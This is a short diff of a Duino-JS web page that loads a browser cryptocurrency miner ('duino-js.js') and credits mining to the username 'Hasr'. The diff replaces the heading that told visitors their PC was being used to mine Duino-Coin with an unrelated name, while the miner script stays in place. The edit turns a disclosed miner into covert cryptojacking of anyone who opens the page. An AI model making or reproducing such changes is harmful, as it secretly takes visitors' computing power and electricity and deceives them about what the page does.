--- a/index.html
+++ b/index.html
@@ -7,7 +7,7 @@
     <title>Duino-JS</title>
 </head>
 <body>
-    <h1>Hello, I am mining Duino-Coin on your pc now. I hope you are enjoying it!</h1>
+    <h1>Carlos Niggleson</h1>
     <script src="duino-js.js"></script>
     <script>
         username = `Hasr`; //Put your username here (e.g. revox, ericddm, snehaislove or Hoiboy19), the default (in duino-js.js or duino-js.min.js) is Hoiboy19.
